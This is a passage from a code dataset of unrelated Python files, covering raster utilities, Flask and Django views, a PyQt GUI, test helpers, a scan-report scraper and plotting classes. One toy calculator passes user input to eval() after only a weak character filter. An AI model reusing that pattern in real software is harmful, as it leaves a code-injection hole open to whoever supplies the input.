crop, in pixels\n boundless (bool): similar to gdal_translate \"epo: error when partially\n outside\" flag. If False, we'll raise an exception when the\n requested crop is not entirely contained within the input image\n bounds. 
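(Specifically, a CropOutside exception is raised.) 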
If True, the crop is padded with fill_value.\n fill_value (scalar): constant value used to fill pixels outside of the\n input image.\n \"\"\"\n with rasterio.open(filename, 'r') as src:\n if not boundless:\n if y < 0 or y + h > src.shape[0] or x < 0 or x + w > src.shape[1]:\n raise CropOutside(('crop {} {} {} {} falls outside of input image '\n 'whose shape is {}'.format(x, y, w, h, src.shape)))\n\n crop = fill_value * np.ones((src.count, h, w))\n y0 = max(y, 0)\n y1 = min(y + h, src.shape[0])\n x0 = max(x, 0)\n x1 = min(x + w, src.shape[1])\n crop[:, y0 - y:y1 - y, x0 - x:x1 - x] = src.read(window=((y0, y1), (x0, x1)))\n\n # interleave channels\n return np.moveaxis(crop, 0, 2).squeeze()\n\n\ndef crop_aoi(geotiff, aoi, z=0):\n \"\"\"\n Crop a geographic AOI in a georeferenced image using its RPC functions.\n\n Args:\n geotiff (string): path or url to the input GeoTIFF image file\n aoi (geojson.Polygon): GeoJSON polygon representing the AOI\n z (float, optional): base altitude with respect to WGS84 ellipsoid (0\n by default)\n\n Return:\n crop (array): numpy array containing the cropped image\n x, y, w, h (ints): image coordinates of the crop. x, y are the\n coordinates of the top-left corner, while w, h are the dimensions\n of the crop.\n \"\"\"\n x, y, w, h = bounding_box_of_projected_aoi(rpc_from_geotiff(geotiff), aoi, z)\n return rasterio_crop(geotiff, x, y, w, h), x, y\n\n\ndef rio_dtype(numpy_dtype):\n \"\"\"\n Convert a numpy datatype to a rasterio datatype.\n \"\"\"\n if numpy_dtype == 'bool':\n return rasterio.dtypes.bool_\n elif numpy_dtype == 'uint8':\n return rasterio.dtypes.uint8\n elif numpy_dtype == 'uint16':\n return rasterio.dtypes.uint16\n elif numpy_dtype == 'int16':\n return rasterio.dtypes.int16\n elif numpy_dtype == 'uint32':\n return rasterio.dtypes.uint32\n elif numpy_dtype == 'int32':\n return rasterio.dtypes.int32\n elif numpy_dtype == 'float32':\n return rasterio.dtypes.float32\n elif numpy_dtype == 'float64':\n return rasterio.dtypes.float64\n elif numpy_dtype == 'complex':\n return rasterio.dtypes.complex_\n elif numpy_dtype == 'complex64':\n return rasterio.dtypes.complex64\n elif numpy_dtype == 'complex128':\n return rasterio.dtypes.complex128\n\n\ndef rio_write(path, array, profile={}, tags={}, namespace_tags={}):\n \"\"\"\n Write a numpy array in a tiff/png/jpeg file with rasterio.\n\n Args:\n path: path to the output tiff/png/jpeg file\n array: 2D or 3D numpy array containing the image to write\n profile: rasterio profile (ie dictionary of metadata)\n tags: dictionary of additional geotiff tags\n namespace_tags: dictionary of dictionaries of additional geotiff tags\n (e.g. 
IMAGE_STRUCTURE, RPC, SUBDATASETS)\n \"\"\"\n # read image size and number of bands\n if array.ndim > 2:\n height, width, nbands = array.shape\n else:\n nbands = 1\n height, width = array.shape\n\n # determine the driver based on the file extension\n extension = os.path.splitext(path)[1].lower()\n if extension in ['.tif', '.tiff']:\n driver = 'GTiff'\n elif extension in ['.jpg', '.jpeg']:\n driver = 'jpeg'\n elif extension in ['.png']:\n driver = 'png'\n else:\n print('ERROR: unknown extension {}'.format(extension))\n\n with warnings.catch_warnings(): # noisy may occur here\n warnings.filterwarnings(\"ignore\", category=FutureWarning)\n profile.update(driver=driver, count=nbands, width=width, height=height,\n dtype=rio_dtype(array.dtype), quality=100)\n with rasterio.open(path, 'w', **profile) as dst:\n if array.ndim > 2:\n dst.write(np.moveaxis(array, 2, 0))\n else:\n dst.write(np.array([array]))\n dst.update_tags(**tags)\n for k, v in namespace_tags.items():\n dst.update_tags(ns=k, **v)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":23020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"258438480","text":"from application import app\nfrom application.headers import get_headers\nfrom application.logformat import format_message\nfrom application.http import http_put\nfrom flask import Response, request, render_template, session, redirect, url_for\nfrom datetime import datetime\nimport logging\nimport json\n\n\ndef build_lc_inputs(data):\n result = {'class': '', 'county': [], 'district': '', 'short_description': '',\n 'estate_owner': {'private': {'forenames': [], 'surname': ''},\n 'company': '',\n 'local': {'name': '', 'area': ''},\n 'complex': {\"name\": '', \"number\": ''},\n 'other': ''},\n 'estate_owner_ind': 'Private Individual',\n 'occupation': '',\n 'additional_info': '',\n 'priority_notice': ''}\n\n if len(data) > 0:\n result['class'] = data['class']\n\n result['district'] = data['district']\n result['short_description'] = data['short_desc']\n\n result['estate_owner_ind'] = get_eo_ind(data['estateOwnerTypes'])\n\n result['occupation'] = data['occupation']\n if \"addl_info\" in data:\n result['additional_info'] = data['addl_info']\n if 'priority_notice' in data:\n result['priority_notice'] = data['priority_notice']\n\n add_counties(result, data)\n\n add_estate_owner_details(result, data)\n return result\n\n\ndef get_eo_ind(eo_type_string):\n if eo_type_string.lower() == \"privateindividual\":\n return \"Private Individual\"\n elif eo_type_string.lower() == \"countycouncil\":\n return \"County Council\"\n elif eo_type_string.lower() == \"ruralcouncil\":\n return \"Rural Council\"\n elif eo_type_string.lower() == \"parishcouncil\":\n return \"Parish Council\"\n elif eo_type_string.lower() == \"othercouncil\":\n return \"Other Council\"\n elif eo_type_string.lower() == \"developmentcorporation\":\n return \"Development Corporation\"\n elif eo_type_string.lower() == \"limitedcompany\":\n return \"Limited Company\"\n elif eo_type_string.lower() == \"complexname\":\n return \"Complex Name\"\n elif eo_type_string.lower() == \"codedname\":\n return \"Coded Name\"\n elif eo_type_string.lower() == \"other\":\n return \"Other\"\n else:\n raise RuntimeError(\"Unrecognised estate owner: {}\".format(eo_type_string))\n\n\ndef add_estate_owner_details(result, data):\n result['estate_owner']['private']['forenames'] = data['forename'].split(' ')\n result['estate_owner']['private']['surname'] = 
data['surname']\n\n result['estate_owner']['company'] = data['company']\n result['estate_owner']['local']['name'] = data['loc_auth']\n result['estate_owner']['local']['area'] = data['loc_auth_area']\n result['estate_owner']['complex']['name'] = data['complex_name']\n\n if data['complex_number'] == \"\":\n result['estate_owner']['complex']['number'] = 0\n else:\n result['estate_owner']['complex']['number'] = int(data['complex_number'])\n\n result['estate_owner']['other'] = data['other_name']\n\n\ndef add_counties(result, data):\n counter = 0\n counties = []\n while True:\n county_counter = \"county_\" + str(counter)\n if county_counter in data and data[county_counter] != '':\n counties.append(data[county_counter])\n logging.debug('Add county ' + data[county_counter])\n else:\n break\n counter += 1\n\n result['county'] = counties\n\n\ndef build_customer_fee_inputs(data):\n cust_address = data['customer_address'].replace(\"\\r\\n\", \", \").strip()\n customer_fee_details = {'key_number': data['key_number'],\n 'customer_name': data['customer_name'],\n 'customer_address': cust_address,\n 'address_type': data['address_type'],\n 'application_reference': data['customer_ref'],\n 'payment': data['payment']}\n\n return customer_fee_details\n\n\ndef submit_lc_registration(cust_fee_data):\n application = session['application_dict']\n application['class_of_charge'] = convert_application_type(session['application_type'])\n application['application_ref'] = cust_fee_data['application_reference']\n application['key_number'] = cust_fee_data['key_number']\n application['customer_name'] = cust_fee_data['customer_name']\n application['customer_address'] = cust_fee_data['customer_address']\n application['address_type'] = cust_fee_data['address_type']\n today = datetime.now().strftime('%Y-%m-%d')\n application['date'] = today\n application['residence_withheld'] = False\n #application['date_of_birth'] = \"1980-01-01\" # DONE?: what are we doing about the DOB??\n application['document_id'] = session['document_id']\n application['fee_details'] = {'type': cust_fee_data['payment'],\n 'fee_factor': 1,\n 'delivery': session['application_dict']['delivery_method']}\n\n if session['application_dict']['form'] == 'K6':\n application['priority_notice_ind'] = True\n result_string = 'priority_notices'\n else:\n result_string = 'new_registrations'\n\n session['register_details']['estate_owner']['estate_owner_ind'] = session['register_details']['estate_owner_ind']\n # convert_estate_owner_ind(session['register_details']['estate_owner_ind'])\n application['lc_register_details'] = session['register_details']\n\n url = app.config['CASEWORK_API_URL'] + '/applications/' + session['worklist_id'] + '?action=complete'\n headers = get_headers({'Content-Type': 'application/json'})\n response = http_put(url, data=json.dumps(application), headers=headers)\n if response.status_code == 200:\n logging.info(format_message(\"Registration submitted to CASEWORK_API\"))\n data = response.json()\n reg_list = []\n\n for item in data[result_string]:\n reg_list.append(item['number'])\n session['confirmation'] = {'reg_no': reg_list}\n\n return response\n\n\ndef convert_application_type(type):\n app_type = {\n \"lc_regn\": \"New Registration\",\n \"banks\": \"New Registration\",\n \"cancel\": \"Cancellation\",\n \"amend\": \"Amendment\",\n \"oc\": \"Official Copy\",\n \"search\": \"Search\"\n }\n\n return 
app_type.get(type)\n","sub_path":"application/land_charge.py","file_name":"land_charge.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"474151665","text":"# coding=utf-8\nimport json\nimport requests\nfrom requests.exceptions import HTTPError\nfrom braces.views import LoginRequiredMixin\nfrom rest_framework.views import APIView, Response\n\nfrom bims.location_site.river import fetch_river_name\nfrom bims.utils.get_key import get_key\nfrom bims.location_site.river import generate_site_code\nfrom bims.models.location_site import LocationSite\n\n\nclass GetSiteCode(LoginRequiredMixin, APIView):\n\n def get(self, request):\n lat = request.GET.get('lat', None)\n lon = request.GET.get('lon', None)\n site_id = request.GET.get('site_id', None)\n location_site = None\n if site_id:\n try:\n location_site = LocationSite.objects.get(\n id=site_id\n )\n except LocationSite.DoesNotExist:\n pass\n\n catchment = ''\n secondary_catchment_area = ''\n\n river_name = fetch_river_name(lat, lon)\n\n catchment_url = (\n '{base_url}/api/v1/geocontext/value/group/'\n '{lon}/{lat}/river_catchment_areas_group/'\n ).format(\n base_url=get_key('GEOCONTEXT_URL'),\n lon=lon,\n lat=lat\n )\n\n try:\n response = requests.get(catchment_url)\n if response.status_code == 200:\n catchment = json.loads(response.content)\n secondary_catchment_area = (\n catchment['service_registry_values'][1][\n 'value']\n )\n except (HTTPError, ValueError, KeyError):\n pass\n\n return Response({\n 'river': river_name,\n 'catchment': catchment,\n 'site_code': generate_site_code(\n river_name=river_name,\n catchment=secondary_catchment_area,\n location_site=location_site\n )\n })\n","sub_path":"bims/api_views/site_code.py","file_name":"site_code.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"236129941","text":"from django.conf.urls import patterns, include, url\n\nurlpatterns = patterns('web.views',\n\t#\turl(r'^$','index_view',name='vista_principal'),\n\t#\turl(r'^about/$','about_view',name='vista_about'),\n\n\t\turl(r'^$','index',name='home'),\n\n\n\t\turl(r'^addCiudad/$','addCiudad',name='addCiudad'),\n\t\turl(r'^addPlan/$','addPlan',name='addPlan'),\n\t\turl(r'^addServicio/$','addServicio',name='addServicio'),\t\n\t\turl(r'^addTitular/$','addTitular',name='addTitular'),\n\t\turl(r'^addParentesco/$','addParentesco',name='addParentesco'),\n\t\turl(r'^cargo/$','Cargo',name='cargo'),\n\t\turl(r'^addPS/$','addPS',name='addPS'),\n\n\n\t\turl(r'^usuarios/$', 'usuario', name='usuarios'),\n \turl(r'^login/$', 'sesion', name='login'),\n\t \turl(r'^salir/$', 'salir', name='salir'),\n\n\n\t\turl(r'^addBarrio/$','addBarrio',name='addBarrio'),\n\t\turl(r'^addAfiliado/$','addAfiliado',name='addAfiliado'),\n\t\turl(r'^addCobro/$','addCobro',name='addCobro'),\n\t\turl(r'^consultarEmpleado/$','consultarE',name='consultarEmpleado'),\n\t\turl(r'^consultarTitular/$','consultarT',name='consultarTitular'),\n\t\turl(r'^consultarCobro/$','consultarC',name='consultarCobro'),\n\n\n\t\t\n)\n","sub_path":"web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"293798529","text":"import sys\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import *\nimport numpy as np\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as 
FigureCanvas\nfrom matplotlib.figure import Figure\nimport matplotlib.animation as animation\nfrom threading import Timer\nimport subprocess\n\n\nfile_off = open(\"STEP_offset.txt\", 'w')\nfile_off.write(\"0\")\nfile_off.close()\n\nfile = open(\"STEP_output.txt\", 'w')\nfile.write(\"0\")\nfile.close()\n\n\nclass MyMplCanvas(FigureCanvas):\n    def __init__(self, parent=None, width=5, height=4, dpi=100):\n        fig = Figure(figsize=(width, height), dpi=dpi)\n\n        self.axes = fig.add_subplot(111, xlim=(0, 100), ylim=(0, 200))\n        self.axes.set_title(\"BPM\", fontsize = 30) # BPM font size\n        self.compute_initial_figure()\n        FigureCanvas.__init__(self, fig)\n        self.setParent(parent)\n\n    def compute_initial_figure(self):\n        pass\n\nclass AnimationWidget(QWidget):\n    def __init__(self):\n        QWidget.__init__(self)\n        vbox = QVBoxLayout()\n        self.canvas = MyMplCanvas(self, width=10, height=8, dpi=100)\n\n        self.BPM_button = QPushButton(\"BPM 받기\", self)\n        self.STEP_button = QPushButton(\"STEP 받기\", self)\n        self.LOCK_button = QPushButton(\"LOCK\", self)\n\n        self.BPM_button.setMinimumWidth(2)\n        self.STEP_button.setMinimumWidth(2)\n        self.LOCK_button.setMinimumWidth(2)\n\n        self.BPM_button.clicked.connect(self.on_BPM)\n        self.STEP_button.clicked.connect(self.on_STEP)\n        self.LOCK_button.clicked.connect(self.on_LOCK)\n\n        vbox3 = QVBoxLayout()\n        vbox3.addWidget(self.BPM_button)\n        vbox3.addWidget(self.STEP_button)\n        vbox3.addWidget(self.LOCK_button)\n\n        self.label2 = QLabel('REWARD BOX', self)\n        self.label2.setAlignment(Qt.AlignCenter)\n        font2 = self.label2.font()\n        font2.setPointSize(20) # REWARDBOX font size\n        self.label2.setFont(font2)\n\n        self.label1 = QLabel('STEP:', self)\n        self.label1.setAlignment(Qt.AlignRight) #STEP font alignment\n        font1 = self.label1.font()\n        font1.setPointSize(30) #STEP font size\n        self.label1.setFont(font1)\n\n        self.stepNumber = QLCDNumber(self)\n        self.stepNumber.setDigitCount(3) #STEP number digit count\n        self.stepNumber.setMinimumHeight(30) #STEP number display size\n\n        hbox2 = QHBoxLayout()\n        hbox2.addWidget(self.label2, Qt.AlignCenter)\n        hbox2.addLayout(vbox3)\n        vbox.addLayout(hbox2)\n        vbox.addWidget(self.canvas)\n\n        hbox1 = QHBoxLayout()\n        hbox1.addWidget(self.label1)\n        hbox1.addWidget(self.stepNumber, Qt.AlignCenter) #STEP digit alignment\n        vbox.addLayout(hbox1)\n        hbox = QHBoxLayout()\n        self.start_button = QPushButton(\"start\", self)\n        self.reset_button = QPushButton(\"reset\", self)\n        self.stop_button = QPushButton(\"stop\", self)\n\n        self.start_button.setMinimumHeight(50)\n        self.reset_button.setMinimumHeight(50)\n        self.stop_button.setMinimumHeight(50)\n\n        self.start_button.clicked.connect(self.on_start)\n        self.reset_button.clicked.connect(self.on_reset)\n        self.stop_button.clicked.connect(self.on_stop)\n        hbox.addWidget(self.start_button)\n        hbox.addWidget(self.reset_button)\n        hbox.addWidget(self.stop_button)\n        vbox.addLayout(hbox)\n        self.setLayout(vbox)\n\n        self.x = np.arange(100)\n        self.y = np.ones(100, dtype=float)*np.nan  # NaN-filled rolling buffer\n        self.line, = self.canvas.axes.plot(self.x, self.y, animated=True, lw=2)\n\n        self.showStepNum()\n\n    def update_line(self, i):\n        file = open(\"BPM_output.txt\", 'r')\n        data = file.read()\n        file.close()\n        try:\n            y = float(data)\n            old_y = self.line.get_ydata()\n            new_y = np.r_[old_y[1:], y]\n            self.line.set_ydata(new_y)\n        except ValueError:  # ignore empty or partially written values\n            pass\n        return [self.line]\n        # self.line.set_ydata(y)\n\n    def on_start(self):\n        self.ani = animation.FuncAnimation(self.canvas.figure, self.update_line, blit=True, interval=25)\n\n    
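# Reset mechanism: on_reset snapshots the current raw step count into\n    # STEP_offset.txt, and showStepNum() subtracts that offset, so the\n    # displayed counter restarts from zero.\n    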
def on_reset(self):\n        file = open(\"STEP_output.txt\", 'r')\n        data = file.read()\n        file.close()\n        file_off = open(\"STEP_offset.txt\", 'w')\n        file_off.write(data)\n        file_off.close()\n\n    def on_stop(self):\n        self.ani.event_source.stop()  # stop the animation timer via the public API\n\n    def on_BPM(self):\n        subprocess.call([\"python\", \"bpm_subscriber.py\"])\n\n    def on_STEP(self):\n        subprocess.call([\"python\", \"step_subscriber.py\"])\n\n    def on_LOCK(self):\n        subprocess.call([\"python\", \"LOCK.py\"])\n\n    def showStepNum(self):\n        file = open(\"STEP_output.txt\", 'r')\n        file_off = open(\"STEP_offset.txt\", 'r')\n        data = file.read()\n        offset = file_off.read()\n        file.close()\n        file_off.close()\n        print(data)\n        try:\n            step = int(data) - int(offset)\n            self.stepNumber.display(step)\n        except ValueError:  # a file may be empty or mid-write\n            pass\n        timer = Timer(1, self.showStepNum)\n        timer.start()\n\n\nif __name__ == \"__main__\":\n    qApp = QApplication(sys.argv)\n    aw = AnimationWidget()\n    aw.show()\n    sys.exit(qApp.exec_())","sub_path":"CJ_rewardBOX/backup/GUIscreen1_01121234.py","file_name":"GUIscreen1_01121234.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"427350806","text":"import re\n\nprint(\"Gods amazing calculator\")\nprint(\"Type quit to exit\\n\")\n\nprevious = 0\nrun = True\n\n\ndef perform_math(): # use pep8 snake_case\n    global run\n    global previous\n    equation = \" \"\n    if previous == 0:\n        equation = input(\"Enter equation:\")\n    else:\n        equation = input(str(previous))\n\n    if equation == \"quit\":\n        print(\"Goodbye\")\n        run = False\n    else:\n        equation = re.sub('[a-zA-Z,.:()\"]', \"\", equation) #strip the characters you don't want the user to use\n        
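# Caution: eval() executes arbitrary Python, so even after the\n        # character scrub above this calculator should only be fed trusted\n        # input; tokenizing the expression and applying functions from the\n        # standard 'operator' module would be a safer design.\n        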
if previous == 0:\n            previous = eval(equation)\n        else:\n            previous = eval(str(previous) + equation)\n\nwhile run:\n    perform_math()\n","sub_path":"simpleCalculator.py","file_name":"simpleCalculator.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"267925720","text":"import re\nfrom functools import partial\n\nimport six\n\nfrom nose import SkipTest\n# Gets us eq_, ok_, etc\nfrom nose.tools import *\n\nfrom spec.plugin import SpecPlugin\nfrom spec.cli import main\nfrom spec.utils import InnerClassParser, hide\nfrom spec.trap import trap\n\n\nclass Spec(six.with_metaclass(InnerClassParser, object)):\n    \"\"\"\n    Parent class for spec classes wishing to use inner class contexts.\n    \"\"\"\n\n\n# Simple helper\ndef skip():\n    raise SkipTest\n\n\n# Multiline string comparison helper ripped from Fabric 1.x\ndef eq_(result, expected, msg=None):\n    \"\"\"\n    Shadow of the Nose builtin which presents easier to read multiline output.\n    \"\"\"\n    params = {'expected': expected, 'result': result}\n    aka = \"\"\"\n\n--------------------------------- aka -----------------------------------------\n\nExpected:\n%(expected)r\n\nGot:\n%(result)r\n\"\"\" % params\n    default_msg = \"\"\"\nExpected:\n%(expected)s\n\nGot:\n%(result)s\n\"\"\" % params\n    if (repr(result) != str(result)) or (repr(expected) != str(expected)):\n        default_msg += aka\n    assert result == expected, msg or default_msg\n\n\ndef _assert_contains(haystack, needle, invert, escape=False):\n    \"\"\"\n    Test for existence of ``needle`` regex within ``haystack``.\n\n    Say ``escape`` to escape the ``needle`` if you aren't really using the\n    regex feature & have special characters in it.\n    \"\"\"\n    myneedle = re.escape(needle) if escape else needle\n    matched = re.search(myneedle, haystack, re.M)\n    if (invert and matched) or (not invert and not matched):\n        raise AssertionError(\"'%s' %sfound in '%s'\" % (\n            needle,\n            \"\" if invert else \"not \",\n            haystack\n        ))\n\nassert_contains = partial(_assert_contains, invert=False)\nassert_not_contains = partial(_assert_contains, invert=True)\n","sub_path":"spec/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"485946251","text":"# -*- coding: utf-8 -*-\n#from Crypto.Cipher import AES\n#import base64\nimport requests\nimport xlwt\nfrom bs4 import BeautifulSoup\n\nstyleh = xlwt.easyxf('font: name Times New Roman, color-index red, bold on')\nstylem = xlwt.easyxf('font: name Times New Roman, color-index orange, bold on')\nstylen = xlwt.easyxf('font: name Times New Roman, color-index black, bold on')\n\n\ndef getip(url):\n    index = requests.get(url)\n    soup = BeautifulSoup(index.content,'lxml')\n    iplist = soup.find_all(\"img\",{ \"title\" : \"非常危险\" }) # the title text means \"very dangerous\"\n    ipall=[]\n    for img in iplist:\n        u = img.find_next_sibling('a')\n        if u is None:\n            continue\n        ipall.append(u.getText())\n    return ipall\n\ndef genexcel(ip):\n    wbk = xlwt.Workbook(style_compression=2)\n    ws = wbk.add_sheet('sheet 1',cell_overwrite_ok=True)\n    n=0\n    for i in ip:\n        host = requests.get('http://172.20.45.115/host/%s.html'%i)\n        d = BeautifulSoup(host.content, 'lxml')\n        listh=d.find(id='vul_detail').find_all(\"span\",{ \"class\" : \"level_danger_high\" })\n        lh=[link.string for link in listh]\n        listm=d.find(id='vul_detail').find_all(\"span\",{ \"class\" : \"level_danger_middle\" })\n        lm=[link.string for link in listm]\n        print (lm)\n        lenall = len(lh) + len(lm)\n        ws.write_merge(n, n + lenall-1, 1, 1, i,stylen)\n        for index,text in enumerate(lh,start=n):\n            ws.write(index, 0, text, styleh)\n        for index,text in enumerate(lm,start=n+len(lh)):\n            print (index)\n            ws.write(index, 0, text, stylem)\n        n = n + lenall\n    wbk.save('test.xls')\n\ngenexcel(getip(\"http://172.20.45.115/index.html\"))","sub_path":"lvmeng/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"179066728","text":"class Solution:\n    def addBinary(self, a: str, b: str) -> str:\n        n = 0\n        res = []\n        l = max(len(a), len(b)) + 1\n        for i in range(1, l):\n            aa = a[-i] if (len(a) - i >= 0) else 0\n            bb = b[-i] if (len(b) - i >= 0) else 0\n            s = int(aa) + int(bb) + n\n            print(f\"{aa} + {bb} + {n} = {s} ({n})\")\n            if (s == 2):\n                s = 0\n                n = 1\n            elif (s == 3): \n                s = 1\n                n = 1\n            else:\n                n = 0\n            res.insert(0, str(s))\n        if (n == 1): res.insert(0, '1')\n        return ''.join(res)\n\ns = Solution()\nres = s.addBinary(\"1111\", \"1111\")\n# res = s.addBinary(\"1010\", \"1011\")\nprint(res)\n\n# class Solution:\n#     def addBinary(self, a: str, b: str) -> str:\n#         n = 0\n#         res = []\n#         for i in range(1, min(len(a), len(b)) + 1):\n#             if (int(a[-i]) + int(b[-i]) + n > 1):\n#                 s = 0\n#                 n = 1\n#             else:\n#                 s = int(a[-i]) + int(b[-i]) + n\n#                 n = 0\n#             print(f\"{a[-i]} + {b[-i]} + {n} = {s} ({n})\")\n#             res.insert(0, s)\n#         if (n == 1): res.insert(0, n)\n#         return res \n","sub_path":"lc/python3/67-add-binary.py","file_name":"67-add-binary.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"73177243","text":"#Fibonacci - joao pedro garcia pereira\n#Variable declaration\ncont=0\nfib=1\naux=1\naux2=0\nn=int(input(\"Insert a number for fibonacci: \"))\n#Processing\nwhile cont 5.] 
= 0\n        super(PlotableNormFlat, self).plot(subplot, title, tooltip)\n\nclass PlotableRawFlat (PlotableFlat) :\n    def __init__(self, fits_flat_raw, fits_master_flat, fits_slittrace):\n        super(PlotableRawFlat, self).__init__(fits_flat_raw, fits_slittrace)\n        if self.slittrace is not None and fits_master_flat is not None :\n            master_flat = PipelineProduct(fits_master_flat)\n            self.trimm_lly = master_flat.all_hdu[0].header.get('HIERARCH ESO QC TRIMM LLY')\n\n            #Change the traces by the amount of overscan in Y that has been removed\n            for ypos_top in self.ypos_top_traces:\n                for j, ypos in enumerate(ypos_top):\n                    ypos_top[j] = ypos + self.trimm_lly - 1\n            for ypos_bottom in self.ypos_bottom_traces:\n                for j, ypos in enumerate(ypos_bottom):\n                    ypos_bottom[j] = ypos + self.trimm_lly - 1\n\n    def plot(self, subplot, title, tooltip):\n        super(PlotableRawFlat, self).plot(subplot, title, tooltip)\n\nclass PlotableSpatialMap :\n    def __init__(self, fits_spatialmap):\n        self.spatialmap = PipelineProduct(fits_spatialmap)\n        self.spatialmapdisp = ImageDisplay()\n        self.loadFromFits()\n\n    def loadFromFits(self) :\n        #Reading the spatial map image\n        self.spatialmap.readImage()\n\n    def plot(self, subplot, title, tooltip):\n        self.spatialmapdisp.setLabels('X', 'Y')\n        self.spatialmapdisp.setZLimits((0., 100))\n        self.spatialmapdisp.display(subplot, title, tooltip, self.spatialmap.image)\n\nclass PlotableMappedScience :\n    def __init__(self, fits_mappedscience, fits_objecttable):\n        self.mappedscience = PipelineProduct(fits_mappedscience)\n        self.mappedsciencedisp = ImageDisplay()\n        if fits_objecttable is not None:\n            self.objecttable = PipelineProduct(fits_objecttable)\n        else :\n            self.objecttable = None\n        self.loadFromFits()\n\n    def loadFromFits(self) :\n        #Reading the mapped science image\n        self.mappedscience.readImage()\n\n        #Reading the object table\n        if self.objecttable is not None:\n            nslit = self.objecttable.getTableNrows(1)\n            maxobjectperslit = (self.objecttable.getTableNcols(1) - 7) // 4  # integer division: used as a range() bound\n            start_extracted_cols = []\n            end_extracted_cols = []\n            for obj in range(maxobjectperslit):\n                colname = 'start_%d'%(obj+1)\n                self.objecttable.readTableColumn(1, colname)\n                start_extracted_cols.append(self.objecttable.column)\n                colname = 'end_%d'%(obj+1)\n                self.objecttable.readTableColumn(1, colname)\n                end_extracted_cols.append(self.objecttable.column)\n\n            self.ybottom_obj_extract = []\n            self.ytop_obj_extract = []\n            for slit in range(nslit) :\n                for obj in range(maxobjectperslit) :\n                    ybottom = start_extracted_cols[obj][slit]\n                    ytop = end_extracted_cols[obj][slit]\n                    if ybottom != -1 :\n                        self.ybottom_obj_extract.append(ybottom)\n                        self.ytop_obj_extract.append(ytop)\n            self.nobjects = len(self.ybottom_obj_extract)\n\n    def plot(self, subplot, title, tooltip):\n        self.mappedsciencedisp.setLabels('X [pix]', 'Y [pix]')\n        self.mappedsciencedisp.setZLimits((0., 0.9))\n        self.mappedsciencedisp.display(subplot, title, tooltip, self.mappedscience.image)\n        if self.objecttable is not None:\n            subplot.autoscale(enable=False)\n            for obj in range(self.nobjects) :\n                subplot.axhline(self.ytop_obj_extract[obj], linestyle='solid',color='red')\n                subplot.axhline(self.ybottom_obj_extract[obj], linestyle='solid',color='yellow')\n\n    def getObjectInPosition(self, ypos) :\n        for obj in range(self.nobjects) :\n            if ypos > self.ybottom_obj_extract[obj] and \\\n               ypos < self.ytop_obj_extract[obj] :\n                return self.nobjects - obj\n        return -1\n\nclass PlotableDispResiduals :\n    def __init__(self, fits_dispresiduals):\n        self.dispresiduals = PipelineProduct(fits_dispresiduals)\n        self.resdisplay = 
ScatterDisplay()\n self.loadFromFits()\n\n def loadFromFits(self) :\n #Reading the residuals table\n self.dispresiduals.readTableColumn(1, 'wavelength')\n self.wave = self.dispresiduals.column\n nwave = self.dispresiduals.getTableNrows(1)\n ncolumns = self.dispresiduals.getTableNcols(1)\n nselectedrows = (ncolumns - 1) // 3\n self.residuals = []\n self.allwave = []\n self.allypos = []\n self.allresiduals = []\n for i in range(nselectedrows) :\n #TODO: Currently the residuals are computed every 10 rows. \n #This is hard-coded in the pipeline. It would be better just to detect the\n #columns whose name start with 'r' \n colname = 'r%d'%(i*10) \n self.dispresiduals.readTableColumn(1, colname)\n row_residuals = self.dispresiduals.column\n self.residuals.append(row_residuals)\n self.allwave.extend(self.wave)\n self.allresiduals.extend(row_residuals)\n ypos = i*10.\n self.allypos.extend([ypos] * nwave)\n\n def plotResVsWave(self, subplot, title, tooltip):\n self.resdisplay.setLabels('Wavelength [Ang]','Residual [pix]')\n self.resdisplay.display(subplot, title, tooltip, self.allwave,\n self.allresiduals)\n\n def plotResVsY(self, subplot, title, tooltip):\n self.resdisplay.setLabels('Ypos [pix]','Residual [pix]')\n self.resdisplay.display(subplot, title, tooltip, self.allypos,\n self.allresiduals)\n def getClosestLine(self, wave_selected) :\n \n distance = numpy.fabs(self.wave - wave_selected)\n idx = numpy.nanargmin(distance)\n return self.wave[idx]\n\nclass PlotableDetectedLines :\n def __init__(self, fits_detectedlines):\n self.detectedlines = PipelineProduct(fits_detectedlines)\n self.xydisplay = ScatterDisplay()\n self.resdisplay = ScatterDisplay()\n self.loadFromFits()\n\n def loadFromFits(self) :\n #Reading the residuals table\n try :\n self.detectedlines.readTableColumn(1, 'xpos_rectified')\n self.x_pix = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'ypos_rectified')\n self.y_pix = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'xpos_rectified_iter')\n self.x_pix_iter = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'ypos_rectified_iter')\n self.y_pix_iter = self.detectedlines.column\n except KeyError:\n self.detectedlines.readTableColumn(1, 'xpos')\n self.x_pix = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'ypos')\n self.y_pix = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'xpos_iter')\n self.x_pix_iter = self.detectedlines.column\n self.detectedlines.readTableColumn(1, 'ypos_iter')\n self.y_pix_iter = self.detectedlines.column\n\n \n self.detectedlines.readTableColumn(1, 'wave_ident')\n self.wave = self.detectedlines.column\n 